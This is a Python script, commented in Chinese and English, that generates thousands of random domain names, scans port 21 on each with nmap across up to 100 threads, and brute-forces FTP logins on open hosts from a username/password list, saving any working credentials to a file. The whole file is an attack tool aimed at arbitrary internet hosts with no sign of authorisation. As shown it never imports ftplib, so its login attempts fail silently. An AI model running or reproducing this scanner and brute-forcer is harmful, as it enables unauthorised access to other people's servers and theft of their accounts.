本代码属于使用python3.4版本 主要是交流 高手勿喷!!
#!/usr/bin/python
# -*- coding: utf-8 -*-
import nmap # 需要使用nmap端口扫描工具的支持 这里不仅要安装nmap的python包 还要安装nmap的windows的应用程序 python包 直接使用pip安装即可 至于nmap for windows 的版本如何安装 请直接度娘
from socket import *
import threading
import sys,random,time
import string,os
import configparser ### 配置文件包
"""端口扫描工具 并且判断如果端口21打开 尝试暴力破解FTP"""
# Module-wide, single-permit semaphore. It is created here for callers that
# want to serialise console output; nothing in this file acquires it.
screenLock = threading.Semaphore(1)
def bruteLogin(hostname, passwdFile):
    """Try each ``username password`` line of *passwdFile* as an FTP login on *hostname*.

    Args:
        hostname: host handed to ``ftplib.FTP()``; it is also echoed in the
            printed result lines.
        passwdFile: path of a text file holding one ``username password``
            pair per line, the two fields separated by a single space.

    Returns:
        ``(userName, passWord)`` of the first pair whose ``login`` call does
        not raise, otherwise ``(None, None)`` once every line has been tried.
    """
    # The handle is never closed explicitly; it is released by garbage collection.
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        # One-second pause before every attempt.
        time.sleep(1)
        userName = line.split(' ')[0]
        # Second field; a trailing '\r' and then a trailing '\n' are stripped.
        # A line without a space raises IndexError here, which is not caught.
        passWord = line.split(' ')[1].strip('\r').strip('\n')
        # print("[+] trying: %s " % hostname + userName + "/" + passWord)
        # print("[-] host:", hostname)
        ##
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print( '\n[*] ' + str(hostname) +\
            ' FTP 账号和密码是: '+userName+"/"+passWord)
            ftp.quit()
            return (userName, passWord)
        except Exception:
            # Any exception raised while connecting or logging in is swallowed
            # and the next line of the file is tried.
            pass
    print( '\n[-]FTP %s攻击失败!.'%hostname)
    return (None, None)
def nmapScan(tgtip, tgtPort, tgtHost):
    """Return the nmap-reported TCP state string of *tgtPort* on *tgtip*.

    Args:
        tgtip: IP address (or host) given to ``PortScanner.scan``.
        tgtPort: port as a string; it is converted with ``int`` for the
            result lookup.
        tgtHost: accepted for call compatibility; not used here.

    Returns:
        The ``'state'`` value from the scan result, or ``None`` when the scan
        or the result lookup raises anything at all.
    """
    scanner = nmap.PortScanner()  # constructed outside the try: its errors propagate
    try:
        scanner.scan(tgtip, tgtPort)
        state = scanner[tgtip]['tcp'][int(tgtPort)]['state']
    except BaseException:
        # Mirrors a bare except: every failure, including a missing host or
        # port entry in the result, maps to None.
        state = None
    return state
def portScan(tgtHost, tgtPorts):
    """Resolve *tgtHost*, scan *tgtPorts* with ``nmapScan`` and record the open ones.

    Side effects: when at least one port is open, appends an INI section named
    *tgtHost* to ``IpConfig.ini`` and prints a progress line; when port 21 is
    among the open ports, calls ``bruteLogin`` and appends its result to
    ``ftp.txt`` if credentials were returned. Always returns ``None``.

    Args:
        tgtHost: host name to resolve and scan.
        tgtPorts: iterable of port numbers; each is passed to ``nmapScan``
            as a string.
    """
    try:
        tgtIP = gethostbyname(tgtHost)
    except:
        # Bare except: any resolution failure (and anything else, including
        # KeyboardInterrupt) silently ends the scan of this host.
        return
    try:
        tgtName = gethostbyaddr(tgtIP) ## reverse lookup of the DNS host name for this IP
    except :
        tgtName = None
    # Process-wide socket default timeout; it applies to every socket created
    # afterwards in any thread, not only to this scan.
    setdefaulttimeout(1)
    scan = {}
    for tgtPort in tgtPorts:
        state = nmapScan(tgtIP,str(tgtPort),tgtHost)
        if state =="open": ### open port found: record it under the host in the dict
            if tgtHost not in scan :
                scan[tgtHost] = []
                scan[tgtHost].append(str(tgtPort))
            else:
                scan[tgtHost].append(str(tgtPort))
    if len(scan)>0: ## export the dict contents as a config-file section
        config =configparser.ConfigParser()
        config.add_section(tgtHost)
        config.set(tgtHost,"IP",tgtIP)
        if tgtName!=None:
            config.set(tgtHost,"主机名",tgtName[0])
        else:
            config.set(tgtHost,"主机名","未知")
        print("当前线程数: %d 当前扫描主机%s开放的端口有:"%(threading.activeCount()-1,tgtHost),scan[tgtHost])
        for x in scan[tgtHost]:
            config.set(tgtHost,"端口%s "%x," isopen")
        # Append mode: sections accumulate across runs, and several worker
        # threads may append concurrently without any lock.
        cfgfile = open('IpConfig.ini','a')
        config.write(cfgfile)
        cfgfile.close()
        if "21" in scan[tgtHost]:
            print( '\n[+]FTP %s开始攻击!.'%tgtIP)
            passwdFile = 'userpass.txt' ## credential list: one "username password" pair per line, e.g. "username password\n"
            res = bruteLogin(tgtIP, passwdFile)
            if res[0]!=None:
                # No trailing newline is written, so consecutive results run together.
                ftp = open("ftp.txt","a")
                ftp.write(tgtIP+" : userName = "+res[0]+" password = "+res[1])
                ftp.close()
def gethost(x):
    """Build a random label of *x* distinct lowercase letters/digits plus ten domain variants.

    Args:
        x: number of characters to draw without replacement from the
            36-character alphabet ``a``–``z``, ``0``–``9``.

    Returns:
        ``(label, names)`` where *names* is the label joined with each of
        ``.cn .cc .com .net .pw .wang .vip .tv .org .pub``, in that order.
    """
    alphabet = "zyxwvutsrqponmlkjihgfedcba1234567890"
    label = "".join(random.sample(alphabet, x))
    suffixes = (".cn", ".cc", ".com", ".net", ".pw",
                ".wang", ".vip", ".tv", ".org", ".pub")
    return (label, [label + tld for tld in suffixes])
def main():
    """Generate 12000 distinct random 4-character labels and scan port 21 on each label's ten domain variants in worker threads.

    Each domain is handed to ``portScan`` in its own thread; the loop pauses
    while more than 100 worker threads are alive.
    """
    # Directory of the nmap executable, appended to PATH so the nmap module can find it.
    driver = "D:\\Python34\\nmap"
    os.environ['PATH']=os.environ['PATH']+';'+driver
    ho =[]  # labels already used; membership test is a linear list scan
    for x in range(12000):
        while True: ## retry until a label not seen before is produced
            hos,Host =gethost(4) ### random domain names
            if hos not in ho:
                ho.append(hos)
                break
            else:
                continue
        ## 21/tcp FTP file transfer
        ## 22/tcp SSH secure login, file transfer (SCP) and port forwarding
        ## 23/tcp Telnet unencrypted text transfer
        ## 25/tcp SMTP Simple Mail Transfer Protocol (E-mail)
        ## 69/udp TFTP Trivial File Transfer Protocol
        ## 79/tcp finger Finger
        ## 80/tcp HTTP hypertext transfer protocol (WWW)
        ## 88/tcp Kerberos authenticating agent
        ## 110/tcp POP3 Post Office Protocol (E-mail)
        ## 113/tcp ident old identification server system
        ## 119/tcp NNTP used for usenet newsgroups
        ## 220/tcp IMAP3
        ## 443/tcp HTTPS used for securely transferring web pages
        ## 3389/tcp Windows server Remote Desktop port
        ## 445/tcp shared-printer port
        ## 139/tcp used by Windows "File and Printer Sharing" and SAMBA
        Port = [21,] ## ports to scan; only port 21 (FTP) here, for speed
        for x in Host:  # shadows the outer loop variable, which is otherwise unused
            t = threading.Thread(target=portScan,args=(x,Port)) ### one thread per random domain
            t.start()
            while True:
                if threading.activeCount()-1>100: ## throttle: wait while more than 100 worker threads are alive
                    time.sleep(1)
                else:
                    break
# Script entry point: runs only when executed directly, not when imported.
if __name__ == '__main__':
    main()